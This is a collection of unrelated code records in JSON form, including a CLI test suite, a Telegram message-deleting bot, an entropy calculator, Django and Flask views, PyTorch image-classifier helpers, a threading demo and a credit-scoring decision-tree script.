params=' --catalog-id {0}'\n ' --goods-id {1}'\n ' --goods-num {2}'\n .format(catalog_id,\n 'goods_id',\n '1234'))\n\n # Check got UUID\n seq_no = output_parser.tables(st_create)[0]['values'][0][1]\n self.assertTrue(seq_no is not None)\n seq_no_dammy = output_parser.tables(st_create_dammy)[0]['values'][0][1]\n self.assertTrue(seq_no is not None)\n\n # Check all param\n check_param = {'catalog_id': catalog_id,\n 'seq_no': seq_no,\n 'goods_id': 'goods_id',\n 'goods_num': '1234',\n }\n self._check_return_param(\n output_parser.tables(st_create)[0]['values'][0],\n check_param)\n\n return seq_no, seq_no_dammy\n\n def _show_catalog_contents(self, role, catalog_id, seq_no):\n \"\"\"Show catalog contents data.\n :param role: running user.\n :param catalog_id: Catalog id.\n :param seq_no: Seq no.\n \"\"\"\n st_get = self.clients[role].run_command(\n 'catalog-contents-get',\n params=' --catalog-id ' + catalog_id + ' --seq-no ' + seq_no)\n catalog_contents = output_parser.tables(st_get)[0]['values'][0]\n\n # Check all param\n check_param = {'catalog_id': catalog_id,\n 'seq_no': seq_no,\n 'goods_id': 'goods_id',\n 'goods_num': '1234',\n }\n self._check_return_param(catalog_contents,\n check_param)\n\n return catalog_contents\n\n def _list_catalog_contents(self, role, catalog_id, seq_no):\n \"\"\"List catalog contents data.\n :param role: running user.\n :param catalog_id: Catalog id.\n \"\"\"\n st_list = self.clients[role].run_command(\n 'catalog-contents-list',\n params=' --catalog-id {0}'\n ' --limit {1}'\n ' --force-show-deleted {2}'\n .format(catalog_id,\n '1000',\n 'true'))\n\n catalog_contents_list = output_parser.tables(st_list)[0]['values']\n self.assertTrue(len(catalog_contents_list) >= 1)\n\n # Check all param\n result = False\n for catalog_contents in catalog_contents_list:\n if catalog_contents[1] == seq_no:\n result = True\n break\n\n self.assertTrue(result)\n\n return catalog_contents_list\n\n def _update_catalog_contents(self,\n role,\n catalog_id,\n seq_no):\n \"\"\"Update catalog contents data.\n :param role: running user.\n :param catalog_id: Catalog id.\n :param seq_no: Seq no.\n :param catalog contents: catalog contents.\n \"\"\"\n st_update = self.clients[role].run_command(\n 'catalog-contents-update',\n params=' --catalog-id {0}'\n ' --seq-no {1}'\n ' --goods-id {2}'\n ' --goods-num {3}'\n .format(catalog_id,\n seq_no,\n 'goods_id_updated',\n '912'))\n\n catalog_contents = output_parser.tables(st_update)[0]['values'][0]\n\n # Check all param\n check_param = {'catalog_id': catalog_id,\n 'seq_no': seq_no,\n 'goods_id': 'goods_id_updated',\n 'goods_num': '912',\n }\n self._check_return_param(catalog_contents, check_param)\n\n return catalog_contents\n\n def _check_return_param(self, return_data, check_param):\n self.assertEqual(return_data[0], check_param['catalog_id'])\n self.assertEqual(return_data[1], check_param['seq_no'])\n self.assertEqual(return_data[2], check_param['goods_id'])\n self.assertEqual(return_data[3], check_param['goods_num'])\n self.assertIsNotNone(return_data[4])\n self.assertIsNotNone(return_data[5])\n self.assertEqual(return_data[6], 'None')\n self.assertEqual(return_data[7], 'False')\n self.assertEqual(return_data[8], 'None')\n self.assertEqual(return_data[9], 'None')\n self.assertEqual(return_data[10], 'None')\n self.assertEqual(return_data[11], 'None')\n self.assertEqual(return_data[12], 'None')\n self.assertEqual(return_data[13], 'None')\n\n @ddt.data('admin', 'user')\n def test_catalog_contents_invalid_show_irregular_no_data(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the Show command(Not exist seq no).\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-000000000005'\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-show',\n params=' --catalog-id % --seq-no %s' %\n (catalog_id, seq_no))\n\n @ddt.data('admin', 'user')\n def test_catalog_contents_list_irregular_params(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the List command(Ignore parameters).\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-000000000005'\n\n args = [' --sort-key a',\n ' --sort-dir a',\n ' --limit a',\n ' --marker a',\n ' --force-show-deleted a']\n\n for arg in args:\n # List data.\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-list %s %s' %\n (catalog_id, arg))\n\n @ddt.data('user')\n def test_catalog_contents_invalid_create_irregular_no_auth(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the Create command(Not exist authority).\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-000000000005'\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-create',\n params=' --catalog-id {0}'\n ' --goods-id {1}'\n ' --goods-num {2}'\n .format(catalog_id, 'goods_id', '1234'))\n\n @ddt.data('admin', 'user')\n def test_catalog_contents_invalid_update_irregular_no_data(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the Update command(Not exist seq no).\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-000000000005'\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-update',\n params=' --catalog-id {0}'\n ' --seq-no {1}'\n ' --goods-id {2}'\n ' --goods-num {3}'\n .format(catalog_id,\n seq_no, 'a', 'a'))\n\n @ddt.data('admin')\n def test_catalog_contents_invalid_delete_irregular_no_data(self, role):\n \"\"\"Do a test of 'Catalog contents commands'\n Test the operation of the Delete command(Not exist catalog id, seq no).\n \"\"\"\n catalog_id = str(uuid.uuid4())\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n\n @ddt.data('user')\n def test_catalog_contents_invalid_delete_irregular_no_authority(self,\n role):\n \"\"\"Do a test of 'Catalog contents commands'\n Test the operation of the Delete command(Not exist authority).\n \"\"\"\n catalog_id = str(uuid.uuid4())\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n","sub_path":"afloclient/tests/functional/test_catalog_contents.py","file_name":"test_catalog_contents.py","file_ext":"py","file_size_in_byte":11950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624158183","text":"import sys\nimport pandas as pd\nsys.path.append(\"..\")\n\nfrom Helper import helpers\n\nnoOfFour = []\n\nurl = 'https://www.espncricinfo.com/series/8039/commentary/1144525/bangladesh-vs-pakistan-43rd-match-icc-cricket-world-cup-2019' \nsoap = helpers.getAndParseURL(url)\ncomments = [x.span for x in soap.findAll(\"div\", {'class': 'commentary-item'})]\n\nfor comment in comments:\n\n\tif comment.get_text() == '4':\n\t\tprint(comment.get_text())\n\t\tnoOfFour.append(comment.getText())\n\ns = pd.Series(noOfFour)\nprint(s)","sub_path":"scrapper/espn.py","file_name":"espn.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"190879266","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 13 17:18:56 2021\r\n\r\n@author: Barathwaj Kesavan\r\n\"\"\"\r\n\r\na=[12,0,39,50,1]\r\ni=0\r\nwhile ia[j]:\r\n key=j\r\n j+=1\r\n a[i],a[key]=a[key],a[i]\r\n i+=1\r\nprint(a)\r\n\r\n\r\n","sub_path":"sort_while.py","file_name":"sort_while.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"516950739","text":"from flask import Flask, request\r\nimport telegram\r\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, Updater\r\nimport datetime\r\nimport pymongo\r\nfrom urllib.parse import quote_plus\r\nimport os\r\nimport time\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n\r\nuser = os.environ.get('MONGO_USER') or \"root\"\r\npassword = os.environ.get('MONGO_PASSWORD') or \"example\"\r\nhost = os.environ.get('MONGO_HOST') or \"localhost\"\r\nport = os.environ.get('MONGO_PORT') or 27017\r\n\r\ntoken = os.environ.get('TG_BOT_TOKEN')\r\n\r\napp = Flask(__name__)\r\nbot = telegram.Bot(token=token)\r\nmongo_client = pymongo.MongoClient(\"mongodb://%s:%s@%s\" % (\r\n quote_plus(user), quote_plus(password), f'{host}:{port}'))\r\ndb = mongo_client[\"tgbot\"]\r\nmsg = db[\"tg-pending\"]\r\ntimer = db[\"tg-timer\"]\r\n\r\ndefaultDestruct = -1\r\ndestroyTimers = {}\r\n\r\n\r\n@app.route('/status')\r\ndef show_status():\r\n return 'Pending to be deleted: '+str(msg.count_documents({}))+' messages.
    '+str(destroyTimers)\r\n\r\n\r\n# @app.route('/process_queue')\r\ndef process_queue():\r\n timeNow = datetime.datetime.now().timestamp()\r\n deleted = 0\r\n while True:\r\n result = msg.find_one_and_delete({ 'expiry': {\"$lt\": timeNow} })\r\n if result is None:\r\n break\r\n else:\r\n try:\r\n msg_deleted = bot.delete_message(result[\"chat_id\"], result[\"msg_id\"])\r\n deleted = deleted + 1\r\n except:\r\n pass \r\n return 'Deleted '+str(deleted)+' messages.'\r\n\r\n\r\n@app.route('/hook', methods=['POST'])\r\ndef webhook_handler():\r\n if request.method == \"POST\":\r\n update = telegram.Update.de_json(request.get_json(force=True), bot)\r\n dispatcher.process_update(update)\r\n return 'ok'\r\n\r\n\r\ndef check_user_admin(bot, chat_id, user_id):\r\n member = bot.get_chat_member(chat_id, user_id)\r\n return (member.status in [\"creator\", \"administrator\"])\r\n\r\n\r\ndef check_bot_admin(bot, chat_id):\r\n self_id = bot.get_me().id\r\n admins = bot.get_chat_administrators(chat_id)\r\n admin_flag = False\r\n for admin in admins:\r\n if str(admin.user.id) == str(self_id):\r\n admin_flag = True\r\n return admin_flag\r\n\r\n\r\ndef status(bot, update):\r\n chat_id = update.message.chat_id\r\n output = '# of pending messages: '+str(msg.count_documents({}))+\"\\n\"\r\n output = output + '# of groups: '+str(timer.count_documents({}))+\"\\n\"\r\n timeNow = datetime.datetime.now().timestamp()\r\n maxExpiry = msg.find_one(sort=[(\"expiry\", 1)])[\"expiry\"]\r\n minExpiry = msg.find_one(sort=[(\"expiry\", -1)])[\"expiry\"]\r\n output = output + 'Next expiry: '+str(int((maxExpiry-timeNow)/60))+\" mins\\n\"\r\n output = output + 'Last expiry: '+str(int((minExpiry-timeNow)/60))+\" mins\\n\\n\"\r\n \r\n output = output + ''+\"\\n\"\r\n chats = timer.find({},{'chat_id':1, 'timer':1, '_id':0})\r\n for tmp in chats:\r\n output = output + tmp['chat_id'] + ': ' +str(tmp['timer'])+\"\\n\"\r\n bot.send_message(chat_id=chat_id, text=output)\r\n\r\n\r\ndef off_timer(bot, update):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n if check_user_admin(bot, chat_id, user_id):\r\n destroyTimers[str(chat_id)] = -1\r\n timer.replace_one({'chat_id': str(chat_id)}, {'chat_id': str(chat_id), 'timer': -1}, True)\r\n bot.send_message(chat_id=chat_id, text='Self-destruct timer is switched off.')\r\n else:\r\n bot.send_message(chat_id=chat_id, text='Bot settings can only be changed by group admins.')\r\n\r\n\r\ndef set_timer(bot, update, args):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n if not check_bot_admin(bot, chat_id):\r\n bot.send_message(chat_id=chat_id, text='DelHistoryBot must be promoted to group admin. Only admins can delete messages. Follow these instructions to add admin:')\r\n bot.send_photo(chat_id=chat_id, photo=\"https://i.imgur.com/90E0DO0.png\")\r\n elif not check_user_admin(bot, chat_id, user_id):\r\n bot.send_message(chat_id=chat_id, text='Bot settings can only be changed by group admins.')\r\n else:\r\n try:\r\n due = int(args[0])\r\n if due > 2875:\r\n bot.send_message(chat_id=chat_id, text='Sorry, must be within 48 hours.')\r\n else:\r\n destroyTimers[str(chat_id)] = due\r\n timer.replace_one({'chat_id': str(chat_id)}, {'chat_id': str(chat_id), 'timer': due}, True)\r\n bot.send_message(chat_id=chat_id, text='Self-destruct timer is set to '+str(due)+' minutes.')\r\n except (IndexError, ValueError):\r\n bot.send_message(chat_id=chat_id, text='Usage: /destroytimer ')\r\n\r\n\r\ndef delete_all(bot, update):\r\n chat_id = update.message.chat_id\r\n user_id = update.message.from_user.id\r\n # bot.send_message(chat_id=chat_id, text=f'chat_id={chat_id}\\nuser_id={user_id}')\r\n if not check_bot_admin(bot, chat_id):\r\n bot.send_message(chat_id=chat_id,\r\n text='DelHistoryBot must be promoted to group admin. Only admins can delete messages. Follow these instructions to add admin:')\r\n bot.send_photo(chat_id=chat_id, photo=\"https://i.imgur.com/90E0DO0.png\")\r\n elif not check_user_admin(bot, chat_id, user_id):\r\n bot.send_message(chat_id=chat_id, text='Only group admins can trigger delete all.')\r\n else:\r\n deleted = 0\r\n while True:\r\n result = msg.find_one_and_delete({'chat_id': str(chat_id)})\r\n if result is None:\r\n # bot.send_message(chat_id=chat_id, text='no msg found')\r\n break\r\n else:\r\n # bot.send_message(chat_id=chat_id, text=f'msg found, result={str(result)}')\r\n try:\r\n msg_deleted = bot.delete_message(result[\"chat_id\"], result[\"msg_id\"])\r\n deleted = deleted + 1\r\n # bot.send_message(chat_id=chat_id, text='msg deleted')\r\n except:\r\n # bot.send_message(chat_id=chat_id, text='msg delete failed')\r\n pass\r\n # bot.send_message(chat_id=chat_id, text='Deleted ' + str(deleted) + ' messages.')\r\n\r\n\r\ndef help(bot, update):\r\n print_str = \"\"\"Before use:\r\nInvite @DelHistoryBot to your group chat\r\nPromote @DelHistoryBot to be group admin\r\nFunctions:\r\n/help: print usage guidelines\r\n/destroytimer : enable timer in minutes, max minutes=2875 (about 2 days)\r\n/destroyoff: disable timer\r\n/destroynow: delete all messages pending for delete immediately\"\"\"\r\n chat_id = update.message.chat_id\r\n bot.send_message(chat_id=chat_id, text=print_str)\r\n\r\n\r\ndef msg_handler(bot, update):\r\n global destroyTimers\r\n chat_id = update.message.chat_id\r\n msg_id = update.message.message_id\r\n dt = update.message.date\r\n #dt = datetime.datetime.now()\r\n chat_timer = defaultDestruct\r\n if (str(chat_id) in destroyTimers):\r\n chat_timer = destroyTimers[str(chat_id)]\r\n if chat_timer == defaultDestruct:\r\n result = timer.find_one({'chat_id': str(chat_id)})\r\n if not result is None:\r\n chat_timer = result['timer']\r\n destroyTimers[str(chat_id)] = chat_timer\r\n if (chat_timer>0):\r\n e = dt.timestamp()+chat_timer*60\r\n msg.insert_one({'chat_id': str(chat_id), 'msg_id': msg_id, 'expiry': e})\r\n\r\n\r\nupdater = Updater(bot=bot, workers=0)\r\ndispatcher = updater.dispatcher\r\ndispatcher.add_handler(CommandHandler(\"status\", status))\r\ndispatcher.add_handler(CommandHandler(\"destroyoff\", off_timer))\r\ndispatcher.add_handler(CommandHandler(\"destroytimer\", set_timer, pass_args=True))\r\ndispatcher.add_handler(CommandHandler(\"destroynow\", delete_all))\r\ndispatcher.add_handler(CommandHandler(\"help\", help))\r\ndispatcher.add_handler(MessageHandler(Filters.all, msg_handler))\r\n\r\n\r\ndef main():\r\n # print('='*100)\r\n # print('running version 0.0.1')\r\n # print('='*100)\r\n def process_queue_job():\r\n while True:\r\n time.sleep(60)\r\n try:\r\n print(process_queue())\r\n except Exception as e:\r\n print(e)\r\n\r\n executor = ThreadPoolExecutor()\r\n _ = executor.submit(process_queue_job)\r\n\r\n app.run(host='0.0.0.0')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"10780132","text":"import array\nimport io\n\nfrom math import ceil, log\nfrom typing import Tuple, List, BinaryIO, AnyStr\n\nfrequency = None\n\n\ndef calculate_entropy(contents: AnyStr) -> float:\n \"\"\" this function calculates the entropy of the file\n It is given by the formula:\n E = -SUM[v in 0..255](p(v) * ln(p(v)))\n \"\"\"\n\n data_length = len(contents)\n\n if data_length == 0:\n return 0\n\n count = array.array('L', [0] * 256)\n\n # keep a count of all the bytes\n for byte in contents:\n count[byte] += 1\n\n entropy = float(0)\n\n for value in count:\n if value:\n prob = (float(value) / data_length)\n entropy += (prob * log(prob, 2))\n entropy *= -1\n\n return entropy\n\n\ndef calculate_partition_entropy(fin: BinaryIO, num_partitions: int = 50) -> Tuple[float, List[float]]:\n \"\"\"Calculate the entropy of a file and its partitions.\"\"\"\n\n # Split input into num_parititions and calculate\n # parition entropy.\n fin.seek(0, io.SEEK_END)\n size = fin.tell()\n fin.seek(0)\n partition_size = int(ceil(size / float(num_partitions)))\n\n # Also calculate full file entropy using buffered calculator.\n p_entropies = []\n fullentropy = BufferedCalculator()\n for _ in range(num_partitions):\n partition = fin.read(partition_size)\n p_entropies.append(calculate_entropy(partition))\n fullentropy.update(partition)\n return fullentropy.entropy(), p_entropies\n\n\nclass BufferedCalculator(object):\n def __init__(self):\n global frequency\n import pyximport\n pyximport.install()\n # noinspection PyUnresolvedReferences\n from assemblyline.common import frequency\n\n self.c = {}\n self.length = 0\n\n def entropy(self) -> float:\n if self.length == 0:\n return 0.0\n\n length = float(self.length)\n\n entropy = 0.0\n for v in self.c.values():\n prob = float(v) / length\n entropy += prob * log(prob, 2)\n\n entropy *= -1\n\n # Make sure we don't return -0.0.\n if not entropy:\n entropy = 0.0\n\n return entropy\n\n def update(self, data: AnyStr, length: int = 0):\n if not length:\n length = len(data)\n\n self.length += length\n self.c = frequency.counts(data, length, self.c)\n","sub_path":"assemblyline/common/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121505364","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets, permissions, status, mixins, generics\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom api.serializers import UserSerializer, GroupSerializer, ArticleSerializer\nfrom api.models import Article\n\nclass ArticleList(APIView):\n def get(self, request, format=None):\n articles = Article.objects.all()\n serializer = ArticleSerializer(articles, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid:\n serializer.save()\n return Response(serializer.data, status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n permission_classes = [permissions.IsAuthenticated]","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279686863","text":"def fib(n):\n \"\"\"\n Fibonacci:\n fib(n) = fib(n-1) + fib(n-2), se n> 1\n fib(n) = 1, se n >= 1\n \"\"\"\n if n > 1:\n return fib(n-1)+fib(n-2)\n else:\n return 1\n\ndef pedir_numero():\n numero = int(input('Digite um numero inteiro: '))\n return numero\n\ndef tela_boas_vindas(nome_programa):\n print(\"*****************************************************\")\n print(\" Bem vindo ao programa:\", nome_programa)\n print(\"*****************************************************\")\n\n#testando a função\ntela_boas_vindas('Fibonacci recursivo')\nnum = pedir_numero()\nfor i in range(0, num+1):\n print('Fib(',i, ') => ', fib(i))","sub_path":"Fontes/FibonacciRecursivo_com_boas_vindas.py","file_name":"FibonacciRecursivo_com_boas_vindas.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"630449968","text":"from characters.character import Character\nfrom entities.characterInfo import CharacterInfo\n\n\nclass Player(Character):\n def __init__(self, name=None, xRatio=0, yRatio=0, level='1', id=None):\n characterInfo = CharacterInfo({\n 'id': id,\n 'name': name,\n 'role': 'player',\n 'imageName': 'player',\n 'level': level,\n 'xRatio': xRatio,\n 'yRatio': yRatio\n })\n super().__init__(characterInfo)\n\n def transfer(self, canvas):\n for obj in self.canvases:\n canvas.delete(obj)\n\n def levelUP(self, space):\n self.level = str(int(self.level) + space)\n","sub_path":"characters/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79293938","text":"from django.urls import path\nfrom . import views\n\napp_name = 'home'\nurlpatterns = [\n path('', views.home_page, name='home_page'),\n path('terms_of_use/', views.terms_of_use, name='terms'),\n path('privacy_policy/', views.privacy_policy, name='privacy'),\n path('how_to/', views.how_to, name='how_to')\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"538905630","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nimport PIL\nfrom PIL import Image\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--data_dir', help='directory for data:', default = './flowers')\nparser.add_argument('--arch', type = str, default = 'vgg16', choices=['vgg16', 'densenet121'], help = 'Only vgg16 and densenet121 supported.')\nparser.add_argument('--save_dir', dest= 'save_dir', type = str, default = './checkpoint.pth', help = 'Folder where the model is saved: default is current.')\nparser.add_argument('--learning_rate', type = float, default = 0.001, help = 'Gradient descent learning rate')\nparser.add_argument('--hidden_layer', type = int, action= 'store', dest = 'hidden_layer', default = 25088, help = 'Number of hidden units #1 for classifier.')\nparser.add_argument('--hidden_layer2', type = int, action= 'store', dest = 'hidden_layer2', default = 4096, help = 'Number of hidden units #2 for classifier.')\nparser.add_argument('--output_layer', type = int, action= 'store', dest = 'output_layer', default = 102, help = 'Number of output units for classifier.')\nparser.add_argument('--epochs', type = int, help = 'Number of epochs', default = 3)\nparser.add_argument('--device', action='store_true', help='Use this flag if you want to use GPU for prediction')\n\nparser.add_argument('--image_path', type=str, help='path of image to be predicted', default = 'flowers/test/1/image_06743.jpg')\nparser.add_argument('--topk', type=int, default=5, help='display top k probabilities')\nparser.add_argument('--cat_to_name', type=str, default='cat_to_name.json', help='provide path to category mapping file')\nparser.add_argument('--checkpoint_path', type=str, help='checkpoint file to be used', default = 'checkpoint.pth')\nargs = parser.parse_args()\n\ndef validation(model, testloader, criterion):\n test_loss = 0\n accuracy = 0\n model.to(device)\n for images, labels in testloader:\n images, labels = images.to(device), labels.to(device)\n output = model.forward(images)\n test_loss += criterion(output, labels).item()\n \n ps = torch.exp(output)\n equality = (labels.data == ps.max(dim=1)[1])\n accuracy += equality.type(torch.FloatTensor).mean()\n \n return test_loss, accuracy\n\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath)\n model = getattr(models, checkpoint['arch'])(pretrained=True)\n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n model.class_to_idx = checkpoint['class_to_idx']\n optimizer = checkpoint['optimizer']\n epochs = checkpoint['epochs']\n \n return model, checkpoint['class_to_idx']\n\ndef process_image(image):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n ''' \n \n image = Image.open(image)\n \n preprocess = transforms.Compose([transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n image = preprocess(image)\n \n return image\n\ndef predict(image_path, model, topk, class_idx_dict):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n \n img = process_image(image_path)\n model.to(device)\n img = img.to(device)\n \n img_classes_dict = {v: k for k, v in class_to_idx.items()}\n \n model.eval()\n \n with torch.no_grad():\n img.unsqueeze_(0)\n output = model.forward(img)\n ps = torch.exp(output)\n probs, classes = ps.topk(topk)\n probs, classes = probs[0].tolist(), classes[0].tolist()\n \n return_classes = []\n for c in classes:\n return_classes.append(img_classes_dict[c])\n \n return probs, return_classes","sub_path":"2_Create_Your_Own_Image_Classifier/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"262421832","text":"def strcmp(a,b):\n if s.index(a)s.index(b):\n return 1\n return 0\n\ns=input()\nt=input()\nt_in_s=[]\nt_not_in_s=\"\"\nfor c in t:\n if c in s:\n t_in_s.append(c)\n else:\n t_not_in_s+=c\nt_in_s=sorted(t_in_s,strcmp)\nans=\"\"\nfor c in t_in_s:\n ans+=c\nans+=t_not_in_s\nprint(ans)","sub_path":"Code/CodeRecords/2530/60670/275130.py","file_name":"275130.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"11752936","text":"# If multiple threads attempts to access the same objects\n# It may end up in an inconsistent state\n# To avoid this issue We need to use lock objects to syncronize threads.\n# A lock object can only be owned by one thread at a time.\n\nimport threading\nimport time\nclass myThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter= counter\n def run(self):\n print(\"Starting \"+self.name)\n threadLock.acquire() # locking \n print_time(self.name, self.counter,3)\n threadLock.release() # release\n\ndef print_time(threadname, delay, counter):\n while counter:\n time.sleep(delay)\n print(threadname, time.ctime(time.time()))\n counter -=1\n\nthreadLock = threading.Lock()\nthreads=[]\nthread1 = myThread(1,\"thread -1 \", 1)\nthread2 = myThread(2,\"thread-2\",2)\nthread1.start()\nthread2.start()\n\nthreads.append(thread1)\nthreads.append(thread2)\n\nfor item in threads:\n item.join()\nprint(\"Exiting main thread!\")\n\n","sub_path":"Syncronize_thread.py","file_name":"Syncronize_thread.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"442856379","text":"\"\"\"\r\nclass Itemlist\r\n\"\"\"\r\n\r\nfrom ItemForHire1 import read_or_write_option\r\nfrom item import Item\r\n\r\n\r\nclass ItemList:\r\n def __init__(self):\r\n \"\"\"\r\n load items from csv file\r\n :return:\r\n \"\"\"\r\n self.items=[]\r\n items=read_or_write_option('r',[])\r\n for item_list in items:\r\n item=Item(item_list[0], item_list[1], float(item_list[2]), item_list[3])\r\n self.items.append(item)\r\n\r\n def add_items(self,new_name, new_info, new_price):\r\n \"\"\"\r\n adding new items into list\r\n :param new_name:\r\n :param new_info:\r\n :param new_price:\r\n :return:\r\n \"\"\"\r\n item=Item(new_name, new_info, float(new_price), \"in\")\r\n self.items.append(item)\r\n\r\n def get_item(self, name):\r\n \"\"\"\r\n allow items to be found via name\r\n :param name:\r\n :return:\r\n \"\"\"\r\n for item in self.items:\r\n if item.name == name:\r\n return item\r\n\r\n def get_item_for_saving(self):\r\n \"\"\"\r\n exporting final list to csv file\r\n :return:\r\n \"\"\"\r\n items_to_save=[]\r\n\r\n for item in self.items:\r\n line=(item.name, item.info, item.price, item.availability)\r\n items_to_save.append(line)\r\n return items_to_save\r\n\r\n def change_availability(self, avai1, avai2):\r\n \"\"\"\r\n change availability\r\n :return:\r\n \"\"\"\r\n for item in self.items:\r\n if item.availability == avai1:\r\n item.availability= avai2\r\n return item\r\n\r\n\r\n","sub_path":"itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"224008093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 9 09:23:19 2020\nArbol de Desiciones\n@author: andyvillamayor\n\"\"\"\n#El calulo del arbol esta hecho automaticamente por DecisionTreeClassifier\n#Parametros = entropia valor maximo de desglose = 6 \n#librerias \nimport pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import export_graphviz\nimport pydot\n\n\n#lectura de datos \ndata= pd.read_csv('creditos.csv',sep =',')\n\n#verificacion de los datos \nprint(data.head())\n\n#validacion del dataframe \nprint(pd.isnull(data).sum()) #tipo cartera tiene 3777 valores faltantes Nan\n\n#calular los la edad \n\ndata['fechaHora'] = pd.to_datetime(data['fechaHora'])\ndata['nacimiento'] = pd.to_datetime(data['nacimiento'])\ndata['edad'] = ((data['fechaHora']-data['nacimiento'])/np.timedelta64(1,'Y')).astype(int)\n#columna edad esta en el ultimo lugar del dataframe\n#verificar en el explorador de variables los cambios \n\n\n# seleccionar variables de la solicitud, sistema financiero y target, descartar variables pos aprobación\n# utilizando Hold out \ndf1 = data.iloc[:,2:3]\ndf2 = data.iloc[:,83:84]\ndf3 = data.iloc[:,4:68]\ndf4 = data.iloc[:,82:83]\n\n# # Unificar en un dataframe filtrado\ndf = pd.concat([df1,df2,df3,df4], axis=1)\n\n# One-hot encoding para variables categoricas\ndfOHEncoded = pd.get_dummies(df)\ndfOHEncoded.head()\n# coloca de forma automatica modifica las variables cualitativas o categoricas a 